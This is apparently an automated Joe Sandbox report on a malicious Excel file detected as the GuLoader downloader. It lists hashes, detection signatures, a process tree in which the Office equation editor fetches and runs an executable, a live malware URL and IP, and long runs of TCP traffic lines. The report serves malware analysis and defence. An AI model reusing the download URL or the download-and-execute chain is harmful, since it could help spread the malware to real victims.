Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U4e5d#U6708#U58f0#U660e_40981677.xls

Overview

General Information

Sample Name:#U4e5d#U6708#U58f0#U660e_40981677.xls
Original Sample Name:_40981677.xls
Analysis ID:1326245
MD5:c1a75affe1c99a629a5fb4b3df7359e9
SHA1:86e4a29c68354c25cda769698fdd189e9f2f14b1
SHA256:649e9cc1261032e6098f6469b87a16e4342c159b29725af71afeb71183513aad
Tags:xls
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Excel sheet contains many unusual embedded objects
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Office equation editor establishes network connection
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores files to the Windows start menu directory
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1996 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1720 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • audiodgse.exe (PID: 2880 cmdline: "C:\Users\user\AppData\Roaming\audiodgse.exe" MD5: 6E8215EEE3034D6DCF18D79D397E5715)
  • AcroRd32.exe (PID: 2456 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
    • RdrCEF.exe (PID: 3708 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
  • EQNEDT32.EXE (PID: 3596 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • audiodgse.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Roaming\audiodgse.exe" MD5: 6E8215EEE3034D6DCF18D79D397E5715)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.1051412581.00000000087F3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1720, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exe
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsReversingLabs: Detection: 34%
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsVirustotal: Detection: 48%Perma Link
    Source: #U4e5d#U6708#U58f0#U660e_40981677.xlsAvira: detected
    Source: http://103.72.68.128/S1510M/smss.exejAvira URL Cloud: Label: malware
    Source: http://103.72.68.128/S1510M/smss.exeAvira URL Cloud: Label: malware
    Source: http://103.72.68.128/S1510M/smss.exejVirustotal: Detection: 11%Perma Link
    Source: http://103.72.68.128/S1510M/smss.exeVirustotal: Detection: 11%Perma Link
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeAvira: detection malicious, Label: HEUR/AGEN.1331786
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exeAvira: detection malicious, Label: HEUR/AGEN.1331786
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exeReversingLabs: Detection: 31%
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\smss[1].exeVirustotal: Detection: 31%Perma Link
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeReversingLabs: Detection: 31%
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeVirustotal: Detection: 31%Perma Link

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\audiodgse.exeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.72.68.128 Port: 80Jump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_004062DD FindFirstFileA,FindClose,5_2_004062DD
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004057A2
    Source: C:\Users\user\AppData\Roaming\audiodgse.exeCode function: 5_2_00402765 FindFirstFileA,5_2_00402765

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035303C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035303C0
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03530435 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03530435
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03530463 ShellExecuteW,ExitProcess,2_2_03530463
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035303DA URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035303DA
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03530342 URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03530342
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03530488 ExitProcess,2_2_03530488
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0353044E ShellExecuteW,ExitProcess,2_2_0353044E
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0353030D ExitProcess,2_2_0353030D
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F03C0 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035F03C0
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F0435 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035F0435
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F0463 ShellExecuteW,ExitProcess,9_2_035F0463
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F03DA URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035F03DA
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F044E ShellExecuteW,ExitProcess,9_2_035F044E
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F030D ExitProcess,9_2_035F030D
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F0488 ExitProcess,9_2_035F0488
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035F0342 URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035F0342
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 103.72.68.128:80 -> 192.168.2.22:49164
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 103.72.68.128:80
